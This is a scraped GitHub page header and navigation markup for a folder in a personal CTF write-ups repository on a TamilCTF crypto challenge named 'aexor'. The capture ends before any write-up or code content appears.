integrity="sha512-6JUQHgkTqBaCCdDugMcO4fQ8YxUHk+m6rwVp2Wxa4FMVz6BbBMPOzGluT4wBq8NTUcFv6DnXSOnt5e85jNgpGg==" type="application/javascript" data-module-id="./chunk-drag-drop.js" data-src="https://github.githubassets.com/assets/chunk-drag-drop-e895101e.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-28pipPJZvizfcYYETJWBBeDHsrDEz7A06d7Y5swgY/OWmsX0ZJW6mkZVFRO7Z/xZh1D1qFbPHGNixfCd1YpBnA==" type="application/javascript" data-module-id="./chunk-contributions-spider-graph.js" data-src="https://github.githubassets.com/assets/chunk-contributions-spider-graph-dbca62a4.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-y0yuiXfWuIeCCcUBT1jacp25vWnFCJWgwLM5G1VM4tmCHdoQbiVjvW/vuSuEXUjtS8WwdioTD5hVv9UULiUlww==" type="application/javascript" data-module-id="./chunk-webgl-warp.js" data-src="https://github.githubassets.com/assets/chunk-webgl-warp-cb4cae89.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-3R5+VhOHwJbG+s7VKlj1HjwVKo/RPldgUh98Yed4XMlk1jH7LP20vRYmLUqnvVaZcgx9x9XdWmQWKaBRQfsVvg==" type="application/javascript" src="https://github.githubassets.com/assets/codespaces-dd1e7e56.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-tfzZxJCbul4TLTQmD9EJzuvXoLZGUCnWTiuJCGnXlaABfL2eD0I/J/IL9blT+JbF1dQvKi1g/E7396zAKdrZTA==" type="application/javascript" src="https://github.githubassets.com/assets/repositories-b5fcd9c4.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-CfJc9iAnfLJnxnvSY41oW/N+iuVSia2CCj/v47XVliM9ACQPKur94EPHnokX0RG8e+FPMhJ2CGy9FfqLYZi4Dg==" type="application/javascript" src="https://github.githubassets.com/assets/topic-suggestions-09f25cf6.js"></script><script crossorigin="anonymous" defer="defer" integrity="sha512-Y9QCffkHDk3/KAoYUMhKeokbNlXWgpO+53XrccRwhUWzMTxEmhnp1ce7OVWP3vOzhCfWaxxnKWW9eVjjny8nRA==" type="application/javascript" src="https://github.githubassets.com/assets/code-menu-63d4027d.js"></script>
<meta name="viewport" content="width=device-width"> <title>CTF-Writeups/TamilCTF/Crypto/aexor at main · 0xM4hm0ud/CTF-Writeups · GitHub</title> <meta name="description" content="This are my personal Writeups for different CTF's. Contribute to 0xM4hm0ud/CTF-Writeups development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/6591a2cd3d0f534713b3c6e35c342770ee7a0ceb8863cdc821fa22209a9fedb5/0xM4hm0ud/CTF-Writeups" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="CTF-Writeups/TamilCTF/Crypto/aexor at main · 0xM4hm0ud/CTF-Writeups" /><meta name="twitter:description" content="This are my personal Writeups for different CTF's. Contribute to 0xM4hm0ud/CTF-Writeups development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/6591a2cd3d0f534713b3c6e35c342770ee7a0ceb8863cdc821fa22209a9fedb5/0xM4hm0ud/CTF-Writeups" /><meta property="og:image:alt" content="This are my personal Writeups for different CTF's. Contribute to 0xM4hm0ud/CTF-Writeups development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="CTF-Writeups/TamilCTF/Crypto/aexor at main · 0xM4hm0ud/CTF-Writeups" /><meta property="og:url" content="https://github.com/0xM4hm0ud/CTF-Writeups" /><meta property="og:description" content="This are my personal Writeups for different CTF's. Contribute to 0xM4hm0ud/CTF-Writeups development by creating an account on GitHub." />
<link rel="assets" href="https://github.githubassets.com/">
<meta name="request-id" content="B2E8:8910:148FE65:15D2D79:61830696" data-pjax-transient="true"/><meta name="html-safe-nonce" content="9e90c93ffb3c397c3a3cdddd36ed0394620337416d656b15818319ed90666fc3" data-pjax-transient="true"/><meta name="visitor-payload" content="eyJyZWZlcnJlciI6IiIsInJlcXVlc3RfaWQiOiJCMkU4Ojg5MTA6MTQ4RkU2NToxNUQyRDc5OjYxODMwNjk2IiwidmlzaXRvcl9pZCI6IjY0ODI3MDc3NzI4ODU2MzI2NjIiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIiOiJmcmEifQ==" data-pjax-transient="true"/><meta name="visitor-hmac" content="0d2b1aac1938383c3a088e72d31135b72f7571a6a80481f6c93a3e7ab78e4ba0" data-pjax-transient="true"/>
<meta name="hovercard-subject-tag" content="repository:391709258" data-pjax-transient>
<meta name="github-keyboard-shortcuts" content="repository,source-code" data-pjax-transient="true" />
<meta name="selected-link" value="repo_source" data-pjax-transient>
<meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" content="KT5gs8h0wvaagLKAVWq8bbeNwnZZK1r1XQysX3xurLU"> <meta name="google-site-verification" content="ZzhVyEFwb7w3e0-uOTltm8Jsck2F5StVihD0exw2fsA"> <meta name="google-site-verification" content="GXs5KoUUkNCoaAZn7wPN-t01Pywp9M3sEjnt_3_ZWPc">
<meta name="octolytics-url" content="https://collector.githubapp.com/github/collect" />
<meta name="analytics-location" content="/<user-name>/<repo-name>/files/disambiguate" data-pjax-transient="true" />
<meta name="hostname" content="github.com"> <meta name="user-login" content="">
<meta name="expected-hostname" content="github.com">
<meta name="enabled-features" content="MARKETPLACE_PENDING_INSTALLATIONS,FILE_UPLOAD_CURSOR_POSITION">
<meta http-equiv="x-pjax-version" content="89408a5ac57f5b71ed7ebb466b241a52be13289bf52f5580353d1ab3681a2237"> <meta http-equiv="x-pjax-csp-version" content="9ea82e8060ac9d44365bfa193918b70ed58abd9413362ba412abb161b3a8d1b6"> <meta http-equiv="x-pjax-css-version" content="8c75751aad52ee8322f8435d51506c1b59a636003602b767a0b479bddfe5cb22"> <meta http-equiv="x-pjax-js-version" content="3cad26b543586e12a4ad3073df6bdffcfe52ab9dafecfd0ffc60594d519fb9b5">
<meta name="go-import" content="github.com/0xM4hm0ud/CTF-Writeups git https://github.com/0xM4hm0ud/CTF-Writeups.git">
<meta name="octolytics-dimension-user_id" content="80924519" /><meta name="octolytics-dimension-user_login" content="0xM4hm0ud" /><meta name="octolytics-dimension-repository_id" content="391709258" /><meta name="octolytics-dimension-repository_nwo" content="0xM4hm0ud/CTF-Writeups" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="391709258" /><meta name="octolytics-dimension-repository_network_root_nwo" content="0xM4hm0ud/CTF-Writeups" />
<link rel="canonical" href="https://github.com/0xM4hm0ud/CTF-Writeups/tree/main/TamilCTF/Crypto/aexor" data-pjax-transient>
<meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats">
<meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors">
<meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors">
<link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg">
<meta name="theme-color" content="#1e2327"><meta name="color-scheme" content="light dark" />
<link rel="manifest" href="/manifest.json" crossOrigin="use-credentials">
</head>
<body class="logged-out env-production page-responsive" style="word-wrap: break-word;">
<div class="position-relative js-header-wrapper "> Skip to content <span> <span></span></span>
<header class="Header-old header-logged-out js-details-container Details position-relative f4 py-2" role="banner"> <div class="container-xl d-lg-flex flex-items-center p-responsive"> <div class="d-flex flex-justify-between flex-items-center"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github color-text-white"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg>
<div class="d-lg-none css-truncate css-truncate-target width-fit p-2">
</div>
<div class="d-flex flex-items-center"> Sign up
<button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link d-lg-none mt-1"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-three-bars color-text-white"> <path fill-rule="evenodd" d="M1 2.75A.75.75 0 011.75 2h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 2.75zm0 5A.75.75 0 011.75 7h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 7.75zM1.75 12a.75.75 0 100 1.5h12.5a.75.75 0 100-1.5H1.75z"></path></svg>
</button> </div> </div>
<div class="HeaderMenu HeaderMenu--logged-out position-fixed top-0 right-0 bottom-0 height-fit position-lg-relative d-lg-flex flex-justify-between flex-items-center flex-auto"> <div class="d-flex d-lg-none flex-justify-end border-bottom color-bg-subtle p-3"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-x color-icon-secondary"> <path fill-rule="evenodd" d="M5.72 5.72a.75.75 0 011.06 0L12 10.94l5.22-5.22a.75.75 0 111.06 1.06L13.06 12l5.22 5.22a.75.75 0 11-1.06 1.06L12 13.06l-5.22 5.22a.75.75 0 01-1.06-1.06L10.94 12 5.72 6.78a.75.75 0 010-1.06z"></path></svg>
</button> </div>
<nav class="mt-0 px-3 px-lg-0 mb-5 mb-lg-0" aria-label="Global"> <details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Why GitHub? <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary> <div class="dropdown-menu flex-auto rounded px-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Features <span>→</span>
Mobile <span>→</span> Actions <span>→</span> Codespaces <span>→</span> Packages <span>→</span> Security <span>→</span> Code review <span>→</span> Issues <span>→</span> Integrations <span>→</span>
GitHub Sponsors <span>→</span> Customer stories<span>→</span> </div> </details> Team Enterprise
<details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Explore <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary>
<div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Explore GitHub <span>→</span>
<h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Learn and contribute</h4> Topics <span>→</span> Collections <span>→</span> Trending <span>→</span> Learning Lab <span>→</span> Open source guides <span>→</span>
<h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Connect with others</h4> The ReadME Project <span>→</span> Events <span>→</span> Community forum <span>→</span> GitHub Education <span>→</span> GitHub Stars program <span>→</span> </div> </details>
Marketplace
<details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Pricing <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary>
<div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-4 mt-0 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Plans <span>→</span>
Compare plans <span>→</span> Contact Sales <span>→</span>
Education <span>→</span> </div> </details> </nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-3 mb-lg-0">
<div class="header-search flex-auto js-site-search position-relative flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="391709258" data-scoped-search-url="/0xM4hm0ud/CTF-Writeups/search" data-owner-scoped-search-url="/users/0xM4hm0ud/search" data-unscoped-search-url="/search" action="/0xM4hm0ud/CTF-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control input-sm header-search-wrapper p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control input-sm header-search-input jump-to-field js-jump-to-field js-site-search-focus js-site-search-field is-clearable" data-hotkey=s,/ name="q" data-test-selector="nav-search-input" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="lzFsgAE1rdnhU+i6C+I1+mdcnuL84eLpM3nH6BOClykw9CJaWMVz3A23BrCPPne++eoh9LYcO7Zs94it/8E4Xg==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-3 mb-4 mb-lg-0 d-inline-block"> Sign in </div>
Sign up </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div data-pjax-replace id="js-flash-container">
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class=" px-2" > <button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div>{{ message }}</div>
</div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" data-pjax-container >
<div id="repository-container-header" class="pt-3 hide-full-screen mb-5" style="background-color: var(--color-page-header-bg);" data-pjax-replace>
<div class="d-flex mb-3 px-3 px-md-4 px-lg-5">
<div class="flex-auto min-width-0 width-fit mr-3"> <h1 class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-icon-secondary mr-2"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <span> 0xM4hm0ud </span> <span>/</span> CTF-Writeups
<span></span><span>Public</span></h1>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell"> <path d="M8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path><path fill-rule="evenodd" d="M8 1.5A3.5 3.5 0 004.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01l.001.006c0 .002.002.004.004.006a.017.017 0 00.006.004l.007.001h10.964l.007-.001a.016.016 0 00.006-.004.016.016 0 00.004-.006l.001-.007a.017.017 0 00-.003-.01l-1.703-2.554a1.75 1.75 0 01-.294-.97V5A3.5 3.5 0 008 1.5zM3 5a5 5 0 0110 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.518 1.518 0 0113.482 13H2.518a1.518 1.518 0 01-1.263-2.36l1.703-2.554A.25.25 0 003 7.947V5z"></path></svg> Notifications
